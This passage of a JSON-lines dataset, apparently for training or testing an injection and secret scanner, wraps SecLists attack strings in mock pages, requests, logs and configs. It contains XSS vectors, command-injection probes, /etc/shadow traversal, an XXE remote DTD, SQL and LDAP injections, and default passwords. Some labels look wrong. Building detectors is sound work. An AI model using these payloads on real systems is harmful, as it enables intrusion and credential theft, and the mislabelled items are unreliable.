"malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<cite id=x tabindex=1 onfocus=alert(1)></cite>", "injection_type": "XSS"}}]} {"id": "seclists_01850", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit String: <XML ID=I><X><C><![CDATA[<IMG SRC=\"javas]]><![CDATA[cript:alert('XSS');\">]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: <XML ID=I><X><C><![CDATA[<IMG SRC=\"javas]]><![CDATA[cript:alert('XSS');\">]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>", "injection_type": "XSS"}}]} {"id": "seclists_01851", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><bgsound id=x tabindex=1 onbeforeactivate=alert(1)></bgsound></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<bgsound id=x tabindex=1 onbeforeactivate=alert(1)></bgsound>", "injection_type": "XSS"}}]} {"id": "seclists_01852", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf ?x=>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "?x=>", "injection_type": "cmd"}}]} {"id": "seclists_01853", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit String: <IMG SRC=\"jav&#x0A;ascript:alert('XSS');\"> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: <IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">", "injection_type": "XSS"}}]} {"id": "seclists_01854", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:charlton", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "charlton"}}]} {"id": "seclists_01855", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit String: '';!--\"<script>alert(0);</script>=&{(alert(1))}</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: '';!--\"<script>alert(0);</script>=&{(alert(1))}", "injection_type": "XSS"}}]} {"id": "seclists_01856", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=/..\\../..\\../..\\../..\\../..\\../..\\../etc/shadow HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "/..\\../..\\../..\\../..\\../..\\../..\\../etc/shadow", "injection_type": "cmd"}}]} {"id": "seclists_01857", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit Name: UTF-7 Encoding\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: UTF-7 Encoding", "injection_type": "XSS"}}]} {"id": "seclists_01858", "source": "seclists", "source_license": "MIT", "text": "filename=;echo$IFSKNVVGI$((69%2B44))$(echo$IFSKNVVGI)KNVVGI%26", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": ";echo$IFSKNVVGI$((69%2B44))$(echo$IFSKNVVGI)KNVVGI%26", "injection_type": "cmd"}}]} {"id": "seclists_01859", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit Description: This very simple but effective vector uses the open method on the name property.\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: This very simple but effective vector uses the open method on the name property.", "injection_type": "XSS"}}]} {"id": "seclists_01860", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=Verifone,<BLANK>,166816,\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Verifone,<BLANK>,166816,"}}]} {"id": "seclists_01861", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:audia4", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "audia4"}}]} {"id": "seclists_01862", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<tfoot onkeypress=\"alert(1)\" contenteditable>test</tfoot> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<tfoot onkeypress=\"alert(1)\" contenteditable>test</tfoot>", "injection_type": "XSS"}}]} {"id": "seclists_01863", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><sup id=x style=\"position:absolute;\" onanimationcancel=\"alert(1)\"></sup></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><sup id=x style=\"position:absolute;\" onanimationcancel=\"alert(1)\"></sup>", "injection_type": "XSS"}}]} {"id": "seclists_01864", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<textarea onauxclick=alert(1)>XSS</textarea> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<textarea onauxclick=alert(1)>XSS</textarea>", "injection_type": "XSS"}}]} {"id": "seclists_01865", "source": "seclists", "source_license": "MIT", "text": "<?xml version=\"1.0\"?>\n<!DOCTYPE xxe [ <!ENTITY % file SYSTEM \"file:///etc/issue\"><!ENTITY % dtd SYSTEM \"http://example.com/evil.dtd\">%dtd;%trick;]>", "findings": [{"category": "malicious", "subcategory": "malicious.xxe", "severity": "critical", "compliance": [], "fields": {"payload": "<!DOCTYPE xxe [ <!ENTITY % file SYSTEM \"file:///etc/issue\"><!ENTITY % dtd SYSTEM \"http://example.com/evil.dtd\">%dtd;%trick;]>", "injection_type": "XXE"}}]} {"id": "seclists_01866", "source": "seclists", "source_license": "MIT", "text": "password: 7779311\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "7779311"}}]} {"id": "seclists_01867", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<div draggable=\"true\" contenteditable>drag me</div><object ondragover=alert(1) contenteditable>drop here</object> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<div draggable=\"true\" contenteditable>drag me</div><object ondragover=alert(1) contenteditable>drop here</object>", "injection_type": "XSS"}}]} {"id": "seclists_01868", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:UNIX,ftp,ftp,@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "UNIX,ftp,ftp,"}}]} {"id": "seclists_01869", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><base draggable=\"true\" ondragleave=\"alert(1)\">test</base></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<base draggable=\"true\" ondragleave=\"alert(1)\">test</base>", "injection_type": "XSS"}}]} {"id": "seclists_01870", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<article onbeforecopy=\"alert(1)\" contenteditable>test</article>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<article onbeforecopy=\"alert(1)\" contenteditable>test</article>", "injection_type": "XSS"}}]} {"id": "seclists_01871", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><style>:target {color: red;}</style><font id=x style=\"transition:color 10s\" ontransitioncancel=alert(1)></font></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<style>:target {color: red;}</style><font id=x style=\"transition:color 10s\" ontransitioncancel=alert(1)></font>", "injection_type": "XSS"}}]} {"id": "seclists_01872", "source": "seclists", "source_license": "MIT", "text": "{% block content %}\n<h1>Hello settings.SECRET_KEY</h1>\n{% endblock %}", "findings": [{"category": "malicious", "subcategory": "malicious.ssti", "severity": "critical", "compliance": [], "fields": {"payload": "settings.SECRET_KEY", "injection_type": "SSTI"}}]} {"id": "seclists_01873", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<bdo id=x tabindex=1 onfocusin=alert(1)></bdo> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<bdo id=x tabindex=1 onfocusin=alert(1)></bdo>", "injection_type": "XSS"}}]} {"id": "seclists_01874", "source": "seclists", "source_license": "MIT", "text": "filename=%0A%20str%3D%24%28echo%20DOIMVY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%0A%20str%3D%24%28echo%20DOIMVY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C", "injection_type": "cmd"}}]} {"id": "seclists_01875", "source": "seclists", "source_license": "MIT", "text": "filename=;id", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": ";id", "injection_type": "cmd"}}]} {"id": "seclists_01876", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf `dir`", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "`dir`", "injection_type": "cmd"}}]} {"id": "seclists_01877", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><nobr onpaste=\"alert(1)\" contenteditable>test</nobr></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<nobr onpaste=\"alert(1)\" contenteditable>test</nobr>", "injection_type": "XSS"}}]} {"id": "seclists_01878", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%22%7C%20%5B%201%20-ne%20%24%28echo%20CINWSA%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526 HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%22%7C%20%5B%201%20-ne%20%24%28echo%20CINWSA%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526", "injection_type": "cmd"}}]} {"id": "seclists_01879", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Author Name: ha.ckers.org</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: ha.ckers.org", "injection_type": "XSS"}}]} {"id": "seclists_01880", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=\")) or pg_sleep(__TIME__)-- HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\")) or pg_sleep(__TIME__)--", "injection_type": "SQL"}}]} {"id": "seclists_01881", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit String: <IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\"> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: <IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">", "injection_type": "XSS"}}]} {"id": "seclists_01882", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = desc", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "desc", "injection_type": "SQL"}}]} {"id": "seclists_01883", "source": "seclists", "source_license": "MIT", "text": "filename=limit", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "limit", "injection_type": "cmd"}}]} {"id": "seclists_01884", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><option id=x tabindex=1 onfocusin=alert(1)></option></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<option id=x tabindex=1 onfocusin=alert(1)></option>", "injection_type": "XSS"}}]} {"id": "seclists_01885", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: \"%20echo%20TZKEKG$((48%2B96))$(echo%20TZKEKG)TZKEKG%7C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\"%20echo%20TZKEKG$((48%2B96))$(echo%20TZKEKG)TZKEKG%7C", "injection_type": "cmd"}}]} {"id": "seclists_01886", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: '%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E", "injection_type": "cmd"}}]} {"id": "seclists_01887", "source": "seclists", "source_license": "MIT", "text": "filename=%3B%20str%3D%24%28echo%20UOMPHD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%3B%20str%3D%24%28echo%20UOMPHD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C", "injection_type": "cmd"}}]} {"id": "seclists_01888", "source": "seclists", "source_license": "MIT", "text": "# LDAP query log\nsearchFilter: |", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "|", "injection_type": "LDAP"}}]} {"id": "seclists_01889", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit Tags: URI exploits, gecko, injection, general\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: URI exploits, gecko, injection, general", "injection_type": "XSS"}}]} {"id": "seclists_01890", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Case Insensitive</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Case Insensitive", "injection_type": "XSS"}}]} {"id": "seclists_01891", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"JavaScript link location\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "JavaScript link location", "injection_type": "XSS"}}]} {"id": "seclists_01892", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: '%26echo%20JPCWXJ$((42%2B48))$(echo%20JPCWXJ)JPCWXJ", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'%26echo%20JPCWXJ$((42%2B48))$(echo%20JPCWXJ)JPCWXJ", "injection_type": "cmd"}}]} {"id": "seclists_01893", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#echo var=\"path_info_translated\" -->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#echo var=\"path_info_translated\" -->", "injection_type": "SSI"}}]} {"id": "seclists_01894", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: 2147483647", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "2147483647", "injection_type": "cmd"}}]} {"id": "seclists_01895", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VAVICY%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VAVICY%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C", "injection_type": "cmd"}}]} {"id": "seclists_01896", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: \"<?xml version=\"\"1.0\"\" encoding=\"\"ISO-8859-1\"\"?><foo><![CDATA[' or 1=1 or ''=']]></foo>\"", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\"<?xml version=\"\"1.0\"\" encoding=\"\"ISO-8859-1\"\"?><foo><![CDATA[' or 1=1 or ''=']]></foo>\"", "injection_type": "cmd"}}]} {"id": "seclists_01897", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><base id=x style=\"position:absolute;\" onanimationcancel=\"alert(1)\"></base></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><base id=x style=\"position:absolute;\" onanimationcancel=\"alert(1)\"></base>", "injection_type": "XSS"}}]} {"id": "seclists_01898", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%7C%20%5B%208%20-ne%20%24%28echo%20WIGALP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522 HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%7C%20%5B%208%20-ne%20%24%28echo%20WIGALP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522", "injection_type": "cmd"}}]} {"id": "seclists_01899", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=Ssangyoung,<BLANK>,2501,\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Ssangyoung,<BLANK>,2501,"}}]} {"id": "seclists_01900", "source": "seclists", "source_license": "MIT", "text": "GET /api/user?filter=//* HTTP/1.1", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "//*", "injection_type": "LDAP"}}]} {"id": "seclists_01901", "source": "seclists", "source_license": "MIT", "text": "filename=%27%0A%20str%3D%24%28echo%20BXLXVP%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%27%0A%20str%3D%24%28echo%20BXLXVP%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22", "injection_type": "cmd"}}]} {"id": "seclists_01902", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Author Name: DoctorDan HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: DoctorDan", "injection_type": "XSS"}}]} {"id": "seclists_01903", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><a id=x tabindex=1 onbeforeactivate=alert(1)></a></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<a id=x tabindex=1 onbeforeactivate=alert(1)></a>", "injection_type": "XSS"}}]} {"id": "seclists_01904", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%22|echo%20WXWDDM$((64%2B94))$(echo%20WXWDDM)WXWDDM HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%22|echo%20WXWDDM$((64%2B94))$(echo%20WXWDDM)WXWDDM", "injection_type": "cmd"}}]} {"id": "seclists_01905", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<tt draggable=\"true\" ondragleave=\"alert(1)\">test</tt>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<tt draggable=\"true\" ondragleave=\"alert(1)\">test</tt>", "injection_type": "XSS"}}]} {"id": "seclists_01906", "source": "seclists", "source_license": "MIT", "text": "<?xml version=\"1.0\"?>\n<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><test></test>", "findings": [{"category": "malicious", "subcategory": "malicious.xxe", "severity": "critical", "compliance": [], "fields": {"payload": "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><test></test>", "injection_type": "XXE"}}]} {"id": "seclists_01907", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = having", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "having", "injection_type": "SQL"}}]} {"id": "seclists_01908", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = group by userid having 1=1--", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "group by userid having 1=1--", "injection_type": "SQL"}}]} {"id": "seclists_01909", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = 'uni/**/on sel/**/ect';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "uni/**/on sel/**/ect", "injection_type": "SQL"}}]} {"id": "seclists_01910", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=&echo%20DPXLYV$((75%2B2))$(echo%20DPXLYV)DPXLYV HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&echo%20DPXLYV$((75%2B2))$(echo%20DPXLYV)DPXLYV", "injection_type": "cmd"}}]} {"id": "seclists_01911", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=Cisco,<BLANK>,public/private/secret,\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Cisco,<BLANK>,public/private/secret,"}}]} {"id": "seclists_01912", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %7C%20%5B%204%20-ne%20%24%28echo%20GJJXKM%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%7C%20%5B%204%20-ne%20%24%28echo%20GJJXKM%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//", "injection_type": "cmd"}}]} {"id": "seclists_01913", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=<xml SRC=\"xsstest.xml\" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<xml SRC=\"xsstest.xml\" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>", "injection_type": "cmd"}}]} {"id": "seclists_01914", "source": "seclists", "source_license": "MIT", "text": "# LDAP query log\nsearchFilter: admin*", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "admin*", "injection_type": "LDAP"}}]} {"id": "seclists_01915", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: !@#0%^#0##018387@#0^^**(()", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "!@#0%^#0##018387@#0^^**(()", "injection_type": "cmd"}}]} {"id": "seclists_01916", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=%2A%28%7C%28objectclass%3D%2A%29%29 HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2A%28%7C%28objectclass%3D%2A%29%29", "injection_type": "SQL"}}]} {"id": "seclists_01917", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%0aecho%20JLCIIE$((76%2B4))$(echo%20JLCIIE)JLCIIE%27 HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%0aecho%20JLCIIE$((76%2B4))$(echo%20JLCIIE)JLCIIE%27", "injection_type": "cmd"}}]} {"id": "seclists_01918", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = or 0=0 --", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "or 0=0 --", "injection_type": "SQL"}}]} {"id": "seclists_01919", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=00 HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "00", "injection_type": "cmd"}}]} {"id": "seclists_01920", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:LANSA,WEBADM,password,", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "LANSA,WEBADM,password,"}}]} {"id": "seclists_01921", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %27&&echo$IFSKITBIZ$((2%2B45))$(echo$IFSKITBIZ)KITBIZ\\", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%27&&echo$IFSKITBIZ$((2%2B45))$(echo$IFSKITBIZ)KITBIZ\\", "injection_type": "cmd"}}]} {"id": "seclists_01922", "source": "seclists", "source_license": "MIT", "text": "filename=<name>','')); phpinfo(); exit;/*</name>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<name>','')); phpinfo(); exit;/*</name>", "injection_type": "cmd"}}]} {"id": "seclists_01923", "source": "seclists", "source_license": "MIT", "text": "# LDAP query log\nsearchFilter: *|", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "*|", "injection_type": "LDAP"}}]} {"id": "seclists_01924", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit String: <body/\u201d\u201d$/onload=x={doc:parent[\u2019document\u2019]};x.doc.writeln(1)\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: <body/\u201d\u201d$/onload=x={doc:parent[\u2019document\u2019]};x.doc.writeln(1)", "injection_type": "XSS"}}]} {"id": "seclists_01925", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = //", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "//", "injection_type": "SQL"}}]} {"id": "seclists_01926", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=&#x03C; HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&#x03C;", "injection_type": "cmd"}}]} {"id": 